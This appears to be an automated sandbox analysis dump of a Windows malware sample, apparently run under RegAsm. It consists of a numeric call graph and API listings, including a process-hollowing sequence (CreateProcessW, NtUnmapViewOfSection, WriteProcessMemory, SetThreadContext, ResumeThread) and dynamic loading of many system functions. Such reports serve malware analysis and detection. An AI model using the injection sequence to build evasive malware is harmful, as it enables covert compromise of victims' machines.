55073->55074 55074->55070 55076 438db0 55075->55076 55077 438dbb LoadLibraryExW 55075->55077 55076->55069 55078 438dd7 GetLastError 55077->55078 55081 438def 55077->55081 55079 438de2 LoadLibraryExW 55078->55079 55078->55081 55079->55081 55080 438e06 FreeLibrary 55080->55076 55081->55076 55081->55080 55083 438cf3 try_get_function 5 API calls 55082->55083 55084 438e2e 55083->55084 55085 438e46 TlsAlloc 55084->55085 55086 438e37 55084->55086 55086->55055 55087->55058 55088->55056 55092 44fc01 55089->55092 55090 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55091 43464e 55090->55091 55091->54730 55091->55046 55092->55090 55094 44f0eb 55093->55094 55095 44f0e2 55093->55095 55094->54746 55098 44efd8 55095->55098 55097->54746 55099 448295 pre_c_initialization 36 API calls 55098->55099 55100 44efe5 55099->55100 55118 44f0f7 55100->55118 55102 44efed 55127 44ed6c 55102->55127 55105 44f004 55105->55094 55108 44f047 55111 446802 _free 20 API calls 55108->55111 55111->55105 55112 44f042 55151 44062d 20 API calls _abort 55112->55151 55114 44f08b 55114->55108 55152 44ec42 20 API calls 55114->55152 55115 44f05f 55115->55114 55116 446802 _free 20 API calls 55115->55116 55116->55114 55119 44f103 ___scrt_is_nonwritable_in_current_image 55118->55119 55120 448295 pre_c_initialization 36 API calls 55119->55120 55125 44f10d 55120->55125 55122 44f191 ___scrt_is_nonwritable_in_current_image 55122->55102 55125->55122 55126 446802 _free 20 API calls 55125->55126 55153 446175 36 API calls 4 library calls 55125->55153 55154 445909 EnterCriticalSection 55125->55154 55155 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 55125->55155 55126->55125 55128 43a837 __cftof 36 API calls 55127->55128 55129 44ed7e 55128->55129 55130 44ed8d GetOEMCP 55129->55130 55131 44ed9f 55129->55131 55132 44edb6 55130->55132 55131->55132 55133 44eda4 GetACP 55131->55133 55132->55105 55134 4461b8 55132->55134 55133->55132 55135 4461f6 55134->55135 55136 4461c6 ___crtLCMapStringA 55134->55136 55157 44062d 20 API calls _abort 55135->55157 55136->55135 55137 4461e1 RtlAllocateHeap 55136->55137 55156 443001 7 API calls 2 library calls 55136->55156 55137->55136 55139 4461f4 55137->55139 55139->55108 55141 44f199 55139->55141 55142 44ed6c 38 API calls 55141->55142 55143 44f1b8 55142->55143 55145 44f209 IsValidCodePage 55143->55145 55148 44f1bf 55143->55148 55150 44f22e ___scrt_get_show_window_mode 55143->55150 55144 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55146 44f03a 55144->55146 55147 44f21b GetCPInfo 55145->55147 55145->55148 55146->55112 55146->55115 55147->55148 55147->55150 55148->55144 55158 44ee44 GetCPInfo 55150->55158 55151->55108 55152->55108 55153->55125 55154->55125 55155->55125 55156->55136 55157->55139 55159 44ef28 55158->55159 55164 44ee7e 55158->55164 55162 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55159->55162 55163 44efd4 55162->55163 55163->55148 55168 4511ac 55164->55168 55167 44aee6 _swprintf 41 API calls 55167->55159 55169 43a837 __cftof 36 API calls 55168->55169 55170 4511cc MultiByteToWideChar 55169->55170 55172 45120a 55170->55172 55173 4512a2 55170->55173 55175 45122b __alloca_probe_16 ___scrt_get_show_window_mode 55172->55175 55176 4461b8 ___crtLCMapStringA 21 API calls 55172->55176 55174 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55173->55174 55177 44eedf 55174->55177 55178 45129c 55175->55178 55180 451270 MultiByteToWideChar 55175->55180 55176->55175 55182 44aee6 55177->55182 55187 435ecd 20 API calls _free 55178->55187 55180->55178 55181 45128c GetStringTypeW 55180->55181 55181->55178 55183 43a837 __cftof 36 API calls 55182->55183 55184 44aef9 55183->55184 55188 44acc9 55184->55188 55187->55173 55189 44ace4 ___crtLCMapStringA 55188->55189 55190 44ad0a MultiByteToWideChar 55189->55190 55191 44ad34 55190->55191 55192 44aebe 55190->55192 55196 4461b8 ___crtLCMapStringA 21 API calls 55191->55196 55197 44ad55 __alloca_probe_16 55191->55197 55193 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55192->55193 55194 44aed1 55193->55194 55194->55167 55195 44ad9e MultiByteToWideChar 55198 44adb7 55195->55198 55210 44ae0a 55195->55210 55196->55197 55197->55195 55197->55210 55215 448c33 55198->55215 55202 44ae19 55204 4461b8 ___crtLCMapStringA 21 API calls 55202->55204 55208 44ae3a __alloca_probe_16 55202->55208 55203 44ade1 55206 448c33 _strftime 11 API calls 55203->55206 55203->55210 55204->55208 55205 44aeaf 55223 435ecd 20 API calls _free 55205->55223 55206->55210 55208->55205 55209 448c33 _strftime 11 API calls 55208->55209 55211 44ae8e 55209->55211 55224 435ecd 20 API calls _free 55210->55224 55211->55205 55212 44ae9d WideCharToMultiByte 55211->55212 55212->55205 55213 44aedd 55212->55213 55225 435ecd 20 API calls _free 55213->55225 55216 44854a _abort 5 API calls 55215->55216 55217 448c5a 55216->55217 55220 448c63 55217->55220 55226 448cbb 10 API calls 3 library calls 55217->55226 55219 448ca3 LCMapStringW 55219->55220 55221 43502b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 55220->55221 55222 448cb5 55221->55222 55222->55202 55222->55203 55222->55210 55223->55210 55224->55192 55225->55210 55226->55219 55228 41cc20 LoadLibraryA GetProcAddress 55227->55228 55229 41cc10 GetModuleHandleA GetProcAddress 55227->55229 55230 41cc49 44 API calls 55228->55230 55231 41cc39 LoadLibraryA GetProcAddress 55228->55231 55229->55228 55230->54751 55231->55230 55536 41b539 FindResourceA 55232->55536 55235 43bda0 new 21 API calls 55236 40f428 ctype 55235->55236 55237 4020b7 28 API calls 55236->55237 55238 40f443 55237->55238 55239 401fe2 28 API calls 55238->55239 55240 40f44e 55239->55240 55241 401fd8 11 API calls 55240->55241 55242 40f457 55241->55242 55243 43bda0 new 21 API calls 55242->55243 55244 40f468 ctype 55243->55244 55539 406e13 55244->55539 55246 40f49b 55246->54753 55248 40fb5e 55247->55248 55250 40fb65 55247->55250 55542 402163 11 API calls 55248->55542 55250->54761 55543 401fab 55251->55543 55432->54768 55433->54777 55434->54781 55437 4020df 11 API calls 55436->55437 55438 406c65 55437->55438 55439 4032a0 28 API calls 55438->55439 55440 406c82 55439->55440 55440->54802 55442 40ebdf 55441->55442 55443 4135ae RegQueryValueExA RegCloseKey 55441->55443 55442->54799 55442->54816 55443->55442 55444->54807 55534->54826 55537 41b556 LoadResource LockResource SizeofResource 55536->55537 55538 40f419 55536->55538 55537->55538 55538->55235 55540 4020b7 28 API calls 55539->55540 55541 406e27 55540->55541 55541->55246 55542->55250 55856 4129da 55857 4129ec 55856->55857 55858 4041a2 28 API calls 55857->55858 55859 4129ff 55858->55859 55860 4020f6 28 API calls 55859->55860 55861 412a0e 55860->55861 55862 4020f6 28 API calls 55861->55862 55863 412a1d 55862->55863 55864 41beac 28 API calls 55863->55864 55865 412a26 55864->55865 55866 412ace 55865->55866 55868 401e65 22 API calls 55865->55868 55867 401e8d 11 API calls 55866->55867 55869 412ad7 55867->55869 55870 412a3d 55868->55870 55871 401fd8 11 API calls 55869->55871 55872 4020f6 28 API calls 55870->55872 55873 412ae0 55871->55873 55874 412a48 55872->55874 55875 401fd8 11 API calls 55873->55875 55876 401e65 22 API calls 55874->55876 55877 412ae8 55875->55877 55878 412a53 55876->55878 55879 4020f6 28 API calls 55878->55879 55880 412a5e 55879->55880 55881 401e65 22 API calls 55880->55881 55882 412a69 55881->55882 55883 4020f6 28 API calls 55882->55883 55884 412a74 55883->55884 55885 401e65 22 API calls 55884->55885 55886 412a7f 55885->55886 55887 4020f6 28 API calls 55886->55887 55888 412a8a 55887->55888 55889 401e65 22 API calls 55888->55889 55890 412a95 55889->55890 55891 4020f6 28 API calls 55890->55891 55892 412aa0 55891->55892 55893 401e65 22 API calls 55892->55893 55894 412aae 55893->55894 55895 4020f6 28 API calls 55894->55895 55896 412ab9 55895->55896 55900 412aef GetModuleFileNameW 55896->55900 55899 404e26 99 API calls 55899->55866 55901 4020df 11 API calls 55900->55901 55902 412b1a 55901->55902 55903 4020df 11 API calls 55902->55903 55904 412b26 55903->55904 55905 4020df 11 API calls 55904->55905 55928 412b32 55905->55928 55906 40da23 32 API calls 55906->55928 55907 401fd8 11 API calls 55907->55928 55908 41ba09 43 API calls 55908->55928 55909 403014 28 API calls 55909->55928 55910 4185a3 31 API calls 55910->55928 55911 412c58 Sleep 55911->55928 55912 40417e 28 API calls 55912->55928 55913 4042fc 84 API calls 55913->55928 55914 401f09 11 API calls 55914->55928 55915 412cfa Sleep 55915->55928 55916 40431d 28 API calls 55916->55928 55917 412d9c Sleep 55917->55928 55918 41c516 32 API calls 55918->55928 55919 412dff DeleteFileW 55919->55928 55920 412e36 DeleteFileW 55920->55928 55921 412e61 55923 412e72 DeleteFileW 55921->55923 55921->55928 55936 401f09 11 API calls 55921->55936 55939 412eff 55921->55939 55922 412e88 Sleep 55922->55928 55923->55928 55924 412f01 55925 401f09 11 API calls 55924->55925 55926 412f0d 55925->55926 55927 401f09 11 API calls 55926->55927 55929 412f19 55927->55929 55928->55906 55928->55907 55928->55908 55928->55909 55928->55910 55928->55911 55928->55912 55928->55913 55928->55914 55928->55915 55928->55916 55928->55917 55928->55918 55928->55919 55928->55920 55928->55921 55928->55922 55928->55924 55932 412ecd Sleep 55928->55932 55930 401f09 11 API calls 55929->55930 55931 412f25 55930->55931 55933 40b93f 28 API calls 55931->55933 55934 401f09 11 API calls 55932->55934 55935 412f38 55933->55935 55934->55921 55937 4020f6 28 API calls 55935->55937 55936->55921 55938 412f58 55937->55938 56047 413268 55938->56047 55939->55931 55942 401f09 11 API calls 55943 412f6f 55942->55943 55944 4130e3 55943->55944 55945 412f8f 55943->55945 55946 41bdaf 28 API calls 55944->55946 55947 41bdaf 28 API calls 55945->55947 55948 4130ec 55946->55948 55949 412f9b 55947->55949 55950 402f31 28 API calls 55948->55950 55951 41bc1f 28 API calls 55949->55951 55952 413123 55950->55952 55953 412fb5 55951->55953 55954 402f10 28 API calls 55952->55954 55955 402f31 28 API calls 55953->55955 55956 413132 55954->55956 55957 412fe5 55955->55957 55958 402f10 28 API calls 55956->55958 55959 402f10 28 API calls 55957->55959 55960 41313e 55958->55960 55961 412ff4 55959->55961 55962 402f10 28 API calls 55960->55962 55963 402f10 28 API calls 55961->55963 55964 41314d 55962->55964 55965 413003 55963->55965 55967 402f10 28 API calls 55964->55967 55966 402f10 28 API calls 55965->55966 55969 413012 55966->55969 55968 41315c 55967->55968 55970 402f10 28 API calls 55968->55970 55971 402f10 28 API calls 55969->55971 55972 41316b 55970->55972 55973 413021 55971->55973 55974 402f10 28 API calls 55972->55974 55975 402f10 28 API calls 55973->55975 55976 41317a 55974->55976 55977 41302d 55975->55977 55978 402ea1 28 API calls 55976->55978 55979 402f10 28 API calls 55977->55979 55980 413184 55978->55980 55981 413039 55979->55981 55982 404aa1 61 API calls 55980->55982 55983 402ea1 28 API calls 55981->55983 55984 413191 55982->55984 55985 413048 55983->55985 55986 401fd8 11 API calls 55984->55986 55987 402f10 28 API calls 55985->55987 55988 41319d 55986->55988 55989 413054 55987->55989 55990 401fd8 11 API calls 55988->55990 55991 402ea1 28 API calls 55989->55991 55992 4131a9 55990->55992 55993 41305e 55991->55993 55994 401fd8 11 API calls 55992->55994 55995 404aa1 61 API calls 55993->55995 55996 4131b5 55994->55996 55997 41306b 55995->55997 55999 401fd8 11 API calls 55996->55999 55998 401fd8 11 API calls 55997->55998 56001 413074 55998->56001 56000 4131c1 55999->56000 56002 401fd8 11 API calls 56000->56002 56003 401fd8 11 API calls 56001->56003 56004 4131ca 56002->56004 56005 41307d 56003->56005 56006 401fd8 11 API calls 56004->56006 56007 401fd8 11 API calls 56005->56007 56008 4131d3 56006->56008 56009 413086 56007->56009 56010 401fd8 11 API calls 56008->56010 56011 401fd8 11 API calls 56009->56011 56012 4130d7 56010->56012 56013 41308f 56011->56013 56015 401fd8 11 API calls 56012->56015 56014 401fd8 11 API calls 56013->56014 56016 41309b 56014->56016 56017 4131e5 56015->56017 56018 401fd8 11 API calls 56016->56018 56019 401f09 11 API calls 56017->56019 56020 4130a7 56018->56020 56021 4131f1 56019->56021 56022 401fd8 11 API calls 56020->56022 56023 401fd8 11 API calls 56021->56023 56024 4130b3 56022->56024 56025 4131fd 56023->56025 56026 401fd8 11 API calls 56024->56026 56027 401fd8 11 API calls 56025->56027 56028 4130bf 56026->56028 56030 413209 56027->56030 56029 401fd8 11 API calls 56028->56029 56032 4130cb 56029->56032 56031 401fd8 11 API calls 56030->56031 56033 413215 56031->56033 56034 401fd8 11 API calls 56032->56034 56035 401fd8 11 API calls 56033->56035 56034->56012 56036 413221 56035->56036 56037 401fd8 11 API calls 56036->56037 56038 41322d 56037->56038 56039 401fd8 11 API calls 56038->56039 56040 413239 56039->56040 56041 401fd8 11 API calls 56040->56041 56042 413245 56041->56042 56043 401fd8 11 API calls 56042->56043 56044 413251 56043->56044 56045 401fd8 11 API calls 56044->56045 56046 412abe 56045->56046 56046->55899 56048 4132a6 56047->56048 56050 413277 56047->56050 56049 4132b5 56048->56049 56059 10001c5b 56048->56059 56051 40417e 28 API calls 56049->56051 56063 411d2d 56050->56063 56053 4132c1 56051->56053 56055 401fd8 11 API calls 56053->56055 56057 412f63 56055->56057 56057->55942 56060 10001c6b ___scrt_fastfail 56059->56060 56067 100012ee 56060->56067 56062 10001c87 56062->56049 56109 411d39 56063->56109 56066 411fa2 22 API calls new 56066->56048 56068 10001324 ___scrt_fastfail 56067->56068 56069 100013b7 GetEnvironmentVariableW 56068->56069 56093 100010f1 56069->56093 56072 100010f1 51 API calls 56073 10001465 56072->56073 56074 100010f1 51 API calls 56073->56074 56075 10001479 56074->56075 56076 100010f1 51 API calls 56075->56076 56077 1000148d 56076->56077 56078 100010f1 51 API calls 56077->56078 56079 100014a1 56078->56079 56080 100010f1 51 API calls 56079->56080 56081 100014b5 lstrlenW 56080->56081 56082 100014d9 lstrlenW 56081->56082 56092 100014d2 56081->56092 56083 100010f1 51 API calls 56082->56083 56084 10001501 lstrlenW lstrcatW 56083->56084 56085 100010f1 51 API calls 56084->56085 56086 10001539 lstrlenW lstrcatW 56085->56086 56087 100010f1 51 API calls 56086->56087 56088 1000156b lstrlenW lstrcatW 56087->56088 56089 100010f1 51 API calls 56088->56089 56090 1000159d lstrlenW lstrcatW 56089->56090 56091 100010f1 51 API calls 56090->56091 56091->56092 56092->56062 56094 10001118 ___scrt_fastfail 56093->56094 56095 10001129 lstrlenW 56094->56095 56106 10002c40 56095->56106 56097 10001148 lstrcatW lstrlenW 56098 10001177 lstrlenW FindFirstFileW 56097->56098 56099 10001168 lstrlenW 56097->56099 56100 100011a0 56098->56100 56101 100011e1 56098->56101 56099->56098 56102 100011c7 FindNextFileW 56100->56102 56103 100011aa 56100->56103 56101->56072 56102->56100 56105 100011da FindClose 56102->56105 56103->56102 56108 10001000 51 API calls ___scrt_fastfail 56103->56108 56105->56101 56107 10002c57 56106->56107 56107->56097 56107->56107 56108->56103 56144 4117d7 56109->56144 56111 411d57 56112 411d6d SetLastError 56111->56112 56113 4117d7 SetLastError 56111->56113 56140 411d35 56111->56140 56112->56140 56114 411d8a 56113->56114 56114->56112 56116 411dac GetNativeSystemInfo 56114->56116 56114->56140 56117 411df2 56116->56117 56128 411dff SetLastError 56117->56128 56147 411cde VirtualAlloc 56117->56147 56120 411e22 56121 411e47 GetProcessHeap HeapAlloc 56120->56121 56173 411cde VirtualAlloc 56120->56173 56123 411e70 56121->56123 56124 411e5e 56121->56124 56126 4117d7 SetLastError 56123->56126 56174 411cf5 VirtualFree 56124->56174 56129 411eb9 56126->56129 56127 411e3a 56127->56121 56127->56128 56128->56140 56130 411f6b 56129->56130 56148 411cde VirtualAlloc 56129->56148 56175 4120b2 GetProcessHeap HeapFree 56130->56175 56133 411ed2 ctype 56149 4117ea 56133->56149 56135 411efe 56135->56130 56153 411b9a 56135->56153 56139 411f36 56139->56130 56139->56140 56169 1000220c 56139->56169 56140->56066 56141 411f5c 56141->56140 56142 411f60 SetLastError 56141->56142 56142->56130 56145 4117e6 56144->56145 56146 4117db SetLastError 56144->56146 56145->56111 56146->56111 56147->56120 56148->56133 56150 4118c0 56149->56150 56152 411816 ctype ___scrt_get_show_window_mode 56149->56152 56150->56135 56151 4117d7 SetLastError 56151->56152 56152->56150 56152->56151 56154 411bbb IsBadReadPtr 56153->56154 56161 411ca5 56153->56161 56157 411bd5 56154->56157 56154->56161 56158 411cbd SetLastError 56157->56158 56159 411ca7 SetLastError 56157->56159 56160 411c8a IsBadReadPtr 56157->56160 56157->56161 56176 440f5d 22 API calls 4 library calls 56157->56176 56158->56161 56159->56161 56160->56157 56160->56161 56161->56130 56163 41198a 56161->56163 56167 4119b0 56163->56167 56164 411a99 56165 4118ed VirtualProtect 56164->56165 56166 411aab 56165->56166 56166->56139 56167->56164 56167->56166 56177 4118ed 56167->56177 56170 10002215 56169->56170 56171 1000221a dllmain_dispatch 56169->56171 56181 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 56170->56181 56171->56141 56173->56127 56174->56128 56175->56140 56176->56157 56178 4118fe 56177->56178 56180 4118f6 56177->56180 56179 411971 VirtualProtect 56178->56179 56178->56180 56179->56180 56180->56167 56181->56171 56182 40165e 56183 401666 56182->56183 56185 401669 56182->56185 56184 4016a8 56186 43455e new 22 API calls 56184->56186 56185->56184 56187 401696 56185->56187 56188 40169c 56186->56188 56189 43455e new 22 API calls 56187->56189 56189->56188 56190 426cdc 56195 426d59 send 56190->56195 56196 10001f3f 56197 10001f4b ___DestructExceptionObject 56196->56197 56214 1000247c 56197->56214 56199 10001f57 ___scrt_is_nonwritable_in_current_image 56200 10001f52 56200->56199 56201 10002041 56200->56201 56202 10001f7c 56200->56202 56230 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 56201->56230 56225 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56202->56225 56205 10002048 56206 10001f8b __RTC_Initialize 56206->56199 56226 100022fc RtlInitializeSListHead 56206->56226 56208 10001f99 ___scrt_initialize_default_local_stdio_options 56227 100046c5 5 API calls _ValidateLocalCookies 56208->56227 56210 10001fad 56210->56199 56228 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56210->56228 56212 10001fb8 56212->56199 56229 10004669 5 API calls _ValidateLocalCookies 56212->56229 56215 10002485 56214->56215 56231 10002933 IsProcessorFeaturePresent 56215->56231 56217 10002491 56232 100034ea 56217->56232 56219 10002496 56220 1000249a 56219->56220 56241 100053c8 56219->56241 56220->56200 56223 100024b1 56223->56200 56225->56206 56226->56208 56227->56210 56228->56212 56229->56199 56230->56205 56231->56217 56233 100034ef ___vcrt_initialize_winapi_thunks 56232->56233 56245 10003936 6 API calls 2 library calls 56233->56245 56235 100034f9 56236 100034fd 56235->56236 56246 100038e8 56235->56246 56236->56219 56238 10003505 56239 10003510 56238->56239 56254 10003972 RtlDeleteCriticalSection 56238->56254 56239->56219 56273 10007457 56241->56273 56244 10003529 7 API calls 3 library calls 56244->56220 56245->56235 56255 10003af1 56246->56255 56250 1000390b 56251 10003918 56250->56251 56261 1000391b 5 API calls ___vcrt_FlsFree 56250->56261 56251->56238 56253 100038fd 56253->56238 56254->56236 56262 10003a82 56255->56262 56257 10003b0b 56258 10003b24 TlsAlloc 56257->56258 56259 100038f2 56257->56259 56259->56253 56260 10003ba2 5 API calls try_get_function 56259->56260 56260->56250 56261->56253 56263 10003aaa 56262->56263 56265 10003aa6 __crt_fast_encode_pointer 56262->56265 56263->56265 56266 100039be 56263->56266 56265->56257 56267 100039cd try_get_first_available_module 56266->56267 56268 100039ea LoadLibraryExW 56267->56268 56270 10003a60 FreeLibrary 56267->56270 56271 10003a77 56267->56271 56272 10003a38 LoadLibraryExW 56267->56272 56268->56267 56269 10003a05 GetLastError 56268->56269 56269->56267 56270->56267 56271->56265 56272->56267 56276 10007470 56273->56276 56274 10002ada _ValidateLocalCookies 5 API calls 56275 100024a3 56274->56275 56275->56223 56275->56244 56276->56274 56277 10005bff 56285 10005d5c 56277->56285 56280 10005c13 56282 10005c1b 56283 10005c28 56282->56283 56293 10005c2b 10 API calls 56282->56293 56286 10005c45 _abort 4 API calls 56285->56286 56287 10005d83 56286->56287 56288 10005d9b TlsAlloc 56287->56288 56289 10005d8c 56287->56289 56288->56289 56290 10002ada _ValidateLocalCookies 5 API calls 56289->56290 56291 10005c09 56290->56291 56291->56280 56292 10005b7a 19 API calls 2 library calls 56291->56292 56292->56282 56293->56280

                                          Executed Functions

                                          Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                          • API String ID: 4236061018-3687161714
                                          • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                          • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                          • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                          • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                          Function 0041812A Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                          APIs
